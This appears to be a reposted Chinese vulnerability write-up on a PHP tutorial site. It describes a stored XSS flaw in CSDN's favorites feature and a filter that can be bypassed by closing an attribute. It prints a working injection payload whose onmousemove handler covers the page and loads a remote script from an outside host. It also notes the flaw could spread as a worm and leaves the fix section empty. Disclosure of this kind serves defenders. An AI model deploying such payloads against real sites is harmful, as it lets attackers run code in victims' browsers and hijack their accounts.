来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] CSDN某存储XSS漏洞被爆出后未被完全修复,因此留下了可利用的机会问题在CSDN空间的收藏功能上。我们可以把任意一个URL在空间发表出来,这个URL还能在个人动态里产生一个链接。但是在...
CSDN某存储XSS漏洞被爆出后未被完全修复,因此留下了可利用的机会 我们可以把任意一个URL在空间发表出来,这个URL还能在个人动态里产生一个链接。 但是在动态里,输出这个链接的时候,过滤并不完全。虽然过滤了<>这样的字符,但是我们仍然可以通过闭合属性的方式,往URL里插入任意HTML属性,导致了xss爆发。
1、进入自己的空间收藏(http://my.csdn.net/my/favorite),点击添加
class="MikuXSS" onmousemove="$.getScript('http://mikuxss.sinaapp.com/12CmMi');$('.MikuXSS').hide();" style="font-size:1px;width:100%;height:100%;position:absolute;left:0px;top:0px;cursor:default; 显而易见,这个链接覆盖整个页面,当鼠标移动时就会加载指定脚本,将链接自动隐藏。 再弄个人畜无害的标题
修复方案: 此漏洞可用于蠕虫传播,未测试 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com